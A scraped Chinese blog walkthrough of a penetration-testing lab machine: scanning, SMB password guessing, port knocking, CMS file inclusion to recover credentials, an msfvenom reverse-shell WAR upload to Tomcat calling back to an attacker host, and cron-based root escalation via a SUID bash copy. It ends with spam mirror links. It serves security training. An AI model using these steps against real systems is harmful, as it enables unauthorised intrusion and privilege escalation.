当前位置: 首页 > wzjs >正文

怎样建网站视频教程国家基础设施建设网站

怎样建网站视频教程,国家基础设施建设网站,网站开发运营公司,wordpress导出文章一、主机发现 arp-scan -l靶机ip为192.168.55.155 二、端口扫描、目录枚举、漏洞扫描、指纹识别 2.1端口扫描 nmap --min-rate 10000 -p- 192.168.55.155发现靶机开放了很多端口,80和8080均开放了 UDP端口扫描 nmap -sU --min-rate 10000 -p- 192.168.55.155靶…

一、主机发现

arp-scan -l

靶机ip为192.168.55.155

二、端口扫描、目录枚举、漏洞扫描、指纹识别

2.1端口扫描

nmap --min-rate 10000 -p- 192.168.55.155

发现靶机开放了很多端口,80和8080均开放了

UDP端口扫描

nmap -sU --min-rate 10000 -p- 192.168.55.155

靶机也开放了UDP端口

2.2目录枚举

dirb http://192.168.55.155:8080

三、进入靶机网站寻找信息,反弹shell

3.1收集目录枚举拿到的信息

访问靶机网页寻找信息

发现是一个开发页面,最后提示我们了一些信息

访问http://192.168.55.155:8080/robots.txt

继续访问http://192.168.55.155:8080/tryharder/tryharder

发现是base64编码,尝试解码

大意是找到了一个密码是“password”

3.2smb服务寻找信息

那还缺少用户名,使用enum4linux工具进行分析smb服务

enum4linux -a 192.168.55.155

找到了四个用户名

尝试弱口令

hydra -L user.txt -p password 192.168.55.155 smb

发现qiu用户的密码是password

登陆该用户

smbclient //192.168.55.155/qiu -U qiu

随后在.private/opensesame目录下发现了config文件

看来这里要用到端口敲门

3.3端口敲门

先开启http服务

knock -v 192.168.55.155 159 27391 4
nmap --min-rate 10000 -p- 192.168.55.155

再开启ssh服务

knock -v 192.168.55.155  17301 28504 9999
nmap --min-rate 10000 -p- 192.168.55.155

继续扫描一下80端口的目录

dirb http://192.168.55.155

3.4 80端口寻找信息

继续访问http://192.168.55.155/robots.txt

又找到了一个新的目录

访问nomercy目录下,找到了cms

去搜索一下历史漏洞

3.5 文件包含漏洞

发现是两个文件包含漏洞

先尝试第一个

再尝试第二个

那使用该漏洞包含8080页面的那个配置文件

找到了thisisasuperduperlonguser用户的密码heartbreakisinevitable

以及fluffy用户的密码freakishfluffybunny

显然thisisasuperduperlonguser用户的等级更高

3.6 反弹shell

去8080的manager页面进行登陆

成功登陆

随后尝试上传文件进行反弹shell

使用msf进行生成shellcode

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.55.147 LPORT=8888 -f war -o shell.war

随后去网页进行访问即可拿到shell

http://192.168.55.155:8080/shell/

四、提权

4.1 获得交互式shell

python -c 'import pty; pty.spawn("/bin/bash")'

4.2 靶机信息收集

没有密码,不能使用sudo权限,

试试切换为thisisasuperduperlonguser或者fluffy用户

可以切换为fluffy用户

该用户也不能用sudo权限

4.3定时任务提权

发现该用户存在定时任务,但是该定时文件不在/etc/crontab下

在home/fluffy/.private/secrets下找到了定时任务

echo 'cp /bin/bash /tmp/bash;chmod 4777 /tmp/bash' >> timeclock
cd /tmp
/tmp/bash -p

成功提权!


文章转载自:

http://SO1Alx1L.pLtbd.cn
http://X9HI2Vfc.pLtbd.cn
http://Ra4Qj4qm.pLtbd.cn
http://EoTbj8n7.pLtbd.cn
http://k5mP02Dc.pLtbd.cn
http://WYf2uaIS.pLtbd.cn
http://vO2rQg4L.pLtbd.cn
http://kyGPvvMJ.pLtbd.cn
http://gwq4JH3z.pLtbd.cn
http://I0jHHtQA.pLtbd.cn
http://UEhXd4gc.pLtbd.cn
http://K0ueTY6w.pLtbd.cn
http://djiNgvIO.pLtbd.cn
http://1NvNQWY6.pLtbd.cn
http://fQ74vnLZ.pLtbd.cn
http://1OWs1l6N.pLtbd.cn
http://8Jn1hQw7.pLtbd.cn
http://2EwurVpk.pLtbd.cn
http://6vRdntp7.pLtbd.cn
http://oV72BnFG.pLtbd.cn
http://ZNh89CjT.pLtbd.cn
http://dB1Wwj5c.pLtbd.cn
http://ONpOFGsz.pLtbd.cn
http://89TZRlsV.pLtbd.cn
http://JeMnsQbs.pLtbd.cn
http://rgpLHJux.pLtbd.cn
http://9iA0sMDz.pLtbd.cn
http://8wxUDPyf.pLtbd.cn
http://aYJsRz5p.pLtbd.cn
http://jn5bBbFI.pLtbd.cn
http://www.dtcms.com/wzjs/771972.html

相关文章:

  • 速橙科技有限公司网站建设门户网站建设技术要求
  • 合肥 电子商务 网站推广完全不收费的聊天软件
  • 专门做网站开发的公司seo是什么姓
  • 最省钱的购物软件杭州网站优化体验
  • 建设网站需要深圳网站建设 贴吧
  • 做网站济南网站重新设计
  • 在哪里学做网站wordpress内容只有自已可见
  • 查询数据的网站怎么做秦皇岛网站开发
  • 增加网站收录网站建设与管理的实训
  • 杭州公司网站开发网站开发竞争性谈判
  • dedecms 生成网站地图墓园网站建设价格
  • 做物流网站费用多少江西做网站找谁
  • 郑州网站建设报价表如何制作公司官网
  • 网站免费域名申请中国中建设计网站
  • 设计公司网站是什么是重要的如何将网站排名做高
  • 大昌建设集团有限公司网站我的文档上传到网站 做链接
  • 小企业网站服务器佛山网站排名推广
  • 99到家网站怎么做地推项目平台
  • invoker wordpress伊宁网站建设优化
  • 网站建设教程(项目式)做网站开发语言
  • 网站开发毕业设计参考文献定制网络接口报警灯生产厂商
  • dedecms 网站还原数据之后 乱码wordpress 汇率
  • 有没有什么排版的网站常熟有没有做阿里巴巴网站
  • 购物网站中加减数目的怎么做小型加工厂管理软件
  • 做彩票网站犯法qq刷赞网站怎么做的
  • 自贡电子商务网站建设广州 骏域网站建设
  • 贵阳网站托管网站制作设计机构
  • 蔚县网站建设wl17581怎样做内网网站
  • 网站建设营销外包公司排名自学软件开发需要多久
  • 南昌网站建设行情网站开发注意